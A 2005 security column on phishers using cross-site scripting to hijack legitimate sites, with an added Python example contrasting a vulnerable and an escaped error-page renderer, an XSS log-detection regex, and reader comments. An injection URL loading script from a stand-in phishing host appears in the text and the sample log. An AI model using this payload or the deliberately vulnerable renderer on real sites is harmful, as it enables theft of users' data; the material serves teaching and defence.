What Phishers Know That You Don't

By Jeremiah Grossman, Guest Columnist | Published April 29, 2005, 10:22 AM

Consider the following URL: http://therealwebsite.com/path/<script%20src=http://phishingsite.com/xss.js></script>

As before, when a user looks at the above Web address, the link still appears completely legitimate, because it is. The difference with this attack is that when users click, they are not redirected; they remain on the real Web site. By using an injected script tag, Phishers can alter the behavior of a Web page. The malicious code transmits any information the user enters directly to the Phisher.

Think of it as Web page spyware. The insidiousness of the attack is that the user remains on the real Web site before and after they click, leaving them unprotected and unaware that anything happened.

Even scarier, there are other ways users may be victimized without clicking at all; it is only a matter of visiting the wrong Web page. Many Web sites allow content submissions from third parties that site visitors can view, including message boards, blog posts and comments, guest books, auction and personals listings, and many other forms of community-driven content.

If an XSS vulnerability exists in any of these systems (think eBay, Yahoo, Amazon, Blogger, etc.), a Phisher could submit malicious script code, and anyone visiting the page would be affected instantly. No need to click anything in your inbox.

Financial services, e-commerce and healthcare Web security professionals all face the same risk: that their organization's own Web site becomes the phishing Web site used to harvest consumer data. Again, none of the solutions I mentioned above can protect against these attacks. No man-in-the-middle server exists, so SSL and token authentication won't raise a red flag. There's no third-party phishing site, so obviously take-down and blacklist services have nothing fake to detect.

That leaves us with e-mail encryption and A/V scanners, which are not effective in this case. While I certainly won't recommend that people ignore these products, let's be clear: one way or another, by e-mail, IM or blog spam, malware, or casual Web surfing, consumers are going to stumble across a piece of XSS code. It's just that simple. See why the Phishers are laughing?

Cross-site scripting can occur on any Web site regardless of platform, language or technology. The smart bet is that just about every Web site has at least one issue and likely a whole lot more. How can Web developers protect consumers from XSS? Find and fix your cross-site scripting vulnerabilities. Diligently validate all incoming data and strip out malicious tags.

Never, ever, ever trust client-side data. This is the most important security lesson for a Web developer to learn.
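
The reflected case from the URL above (a site echoing the requested path into an error page) and the stored case in community content both come down to the same defect: client-supplied text written into HTML as markup. The following is an added example, not code from the column or from any site it names; it places a vulnerable renderer beside its hardened form (HTML-encoding on output, which is the strip-or-validate step the column recommends) and adds a small server-side log check. Function names, the access-log lines and the IP addresses are constructed for illustration.

```python
# Added example (not from the original article): the reflected-XSS case from the
# column, where a site echoes the requested path back into an error page, shown
# as a vulnerable renderer beside its hardened form, plus a small log check.
# All names and sample data below are constructed for illustration.
import html
import re
from urllib.parse import unquote

# The injected path from the article, as it arrives at the server (decoded).
INJECTED_PATH = unquote("/path/<script%20src=http://phishingsite.com/xss.js></script>")


def render_not_found_vulnerable(path: str) -> str:
    """Echoes client-supplied data straight into HTML: the bug the column describes."""
    return "<html><body><p>Sorry, " + path + " was not found.</p></body></html>"


def render_not_found_hardened(path: str) -> str:
    """HTML-encodes the untrusted value so the browser shows it as text, never markup."""
    safe = html.escape(path, quote=True)
    return "<html><body><p>Sorry, " + safe + " was not found.</p></body></html>"


def contains_active_markup(page: str) -> bool:
    """True if the rendered page carries a live <script> element."""
    return re.search(r"<script\b", page, re.IGNORECASE) is not None


# Server-side detection: flag requests whose path or query smuggles a tag or a
# javascript: URL, so injection attempts against the real site show up in review.
SUSPECT = re.compile(r"(?i)(%3C|<)\s*/?\s*(script|iframe|img|svg)\b|javascript\s*:")


def flag_suspect_requests(log_lines):
    """Returns request targets from common-log-format lines that look like XSS probes."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if m and SUSPECT.search(unquote(m.group(1))):
            hits.append(m.group(1))
    return hits


# Constructed access-log sample: one benign request, one carrying the article's payload.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Apr/2005:10:22:00 +0000] "GET /path/index.html HTTP/1.1" 200 512',
    '203.0.113.9 - - [29/Apr/2005:10:23:00 +0000] "GET /path/%3Cscript%20src=http://phishingsite.com/xss.js%3E%3C/script%3E HTTP/1.1" 404 88',
]

if __name__ == "__main__":
    print(contains_active_markup(render_not_found_vulnerable(INJECTED_PATH)))  # True
    print(contains_active_markup(render_not_found_hardened(INJECTED_PATH)))    # False
    print(flag_suspect_requests(SAMPLE_LOG))
```

The same `html.escape` step applies to stored content such as comments or listings before it is rendered to other visitors; the log check is a triage aid for the defender's own site, not a substitute for fixing the output.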

How can users protect themselves from XSS? Be extremely skeptical about any unexpected e-mail asking you to visit a Web site and do something. If you think the e-mail might be real but you're unsure, type the Web site domain name manually into your browser or use a bookmark. A healthy dose of paranoia is the best defense.

Jeremiah Grossman is the founder and Chief Technology Officer of WhiteHat Security, where he is responsible for Web application security R&D and industry evangelism. As a 7-year industry veteran and well-known security expert, Mr. Grossman is a frequent conference speaker. Mr. Grossman is also a founder of the Web Application Security Consortium (WASC), as well as a contributing member of the Center for Internet Security Apache Benchmark Group. Prior to founding WhiteHat, Mr. Grossman was an information security officer at Yahoo, responsible for performing security reviews on the company's hundreds of Web sites.

Comments

Just found this:

http://toolbar.netcraft.com/

It looks promising. I've already tested it on some phishing sites I knew of and it worked - it popped up a warning telling me about possible XSS. Maybe we're closer to a solution than I thought. Then again, maybe not.

Score: 0

Could a website create a sort of unreproducible graphic? Like the holograms on MS CDs or a watermark on a dollar bill that verifies the authenticity of the page.

If eBay, Amazon or Google decide to nip this issue they could develop some sort of element that says this is authentic.

If certain elements or images are being hijacked or not served from the correct server, then a message saying 'this is not an authentic source' could be shown.

While I'm not a developer by trade I do have some development background. I just figure Amazon or Google, who love technology, could come up with something interesting.

Score: 0

BetaNews mentions everything except the only real solution which is taking legal action against phishers.

Score: 0

What will be more interesting is that Microsoft will not be able to address this issue, it looks like, with Longhorn, and certainly not with XP's current tools. Microsoft finally included a decent level of security with XP, with a firewall that does well enough and bugging the user to stay up to date with AV... but phishing is an open hole and it will take education, not definition-based updates or toolbars or browser updates, to stop this. It could seriously erode people's confidence in computing in general, let alone browsing the web, at least for people burnt by this.

Score: 0

I'm not going to act like I know any more about phishing than is explained in this article, but it seems like there would have to be some way to have the browser be able to identify XSS, either through a plugin (i.e. Firefox plugins) or maybe even a function integrated into future browsers (IE8 maybe? lol - it would take that long).

Is anyone formulating ideas for a service or product that can help with this? Like I said below, in my humble amateurish opinion, it seems like this would be easier to tackle on the client side. That's just my two cents.

Score: 0

The basic problem is the incredible lack of knowledge of most PC users of how to use their OS. These are not "noobies". Some of these people have been using computers for many years. They don't realize that Windows has a command line, can't create toolbars in the taskbar, move icons to the QuickLaunch Bar and have never edited their registry.

When they download software they almost always think that bigger is better. These people don't have a clue or know where to buy one. There are a lot of "so-called" experts who have never written a lesson plan or created a training module, so their "help" is in computer jargon that only geeks can understand.

If you have no idea how to install and configure your OS, or understand what a baseline and system image are, then phishers are going to eat your system. This is an even bigger problem if you have lots of bandwidth.

Score: 0

We got to stop whining now, what part of DO NOT give out account information, SSN or other sensitive data online do people not understand? My bank for example tells me loud and clear that they will NEVER ask for such things other than via snail mail, so since I actually read my terms of service agreement I discard ALL email sent from "them" to me, it is THAT easy to avoid phishing.

And hey IF the message was genuine, then they are out of luck because you are just following your agreement.

So stop whining, you would not give ME any info if I walked up to you on the street and introduced myself as your banker, would you? It is the same with emails etc.

Score: 0

lol. ummm... did you read beyond the 4th paragraph? This vulnerability is not related to e-mail. XSS can be exploited on any site that allows third parties to post information (Google, eBay, Amazon, etc...). We are far beyond the age where e-mail attachments were the biggest concern.

This scam can easily affect ANYONE if they are not careful. This time you don't have to click the link in the e-mail that says "get more smileys" ;-)

Score: 0

When I posted this comment, this was in the address bar:
http://www.betanews.com/http://hackersheaven.com/

Is that normal? :p

That was really interesting. Is there any way to identify these tricks on the client side? For example, could someone write a Firefox plugin that checks the address bar for multiple domains? Or would that even work in most cases?

Anyway, I'm definitely going to be more paranoid from now on. Thanks a lot :p

Score: 0

There is a good plug-in for Firefox called spoof-stix. It is a toolbar that tells you what site you are on regardless of what URL you typed in the address bar...

Score: 0

These XSS vulnerabilities that Phishers exploit are all the more dangerous because they originate __from the valid site__, yet the attacker can still execute malicious code.

The firefox plugin you mention will not protect you in any way from the class of vulnerabilities Jeremiah described.

Score: 0

That sounds like it would help a little, but would it catch scripts in the URL that could redirect information entered on the website?

I was wondering if someone could write a plugin like that to look for more than one domain and/or scripts that could be malicious.

It sounds to me like this problem would be much simpler to tackle on the client-side than on the server side, but that is just my humble amateurish opinion.

Score: 0
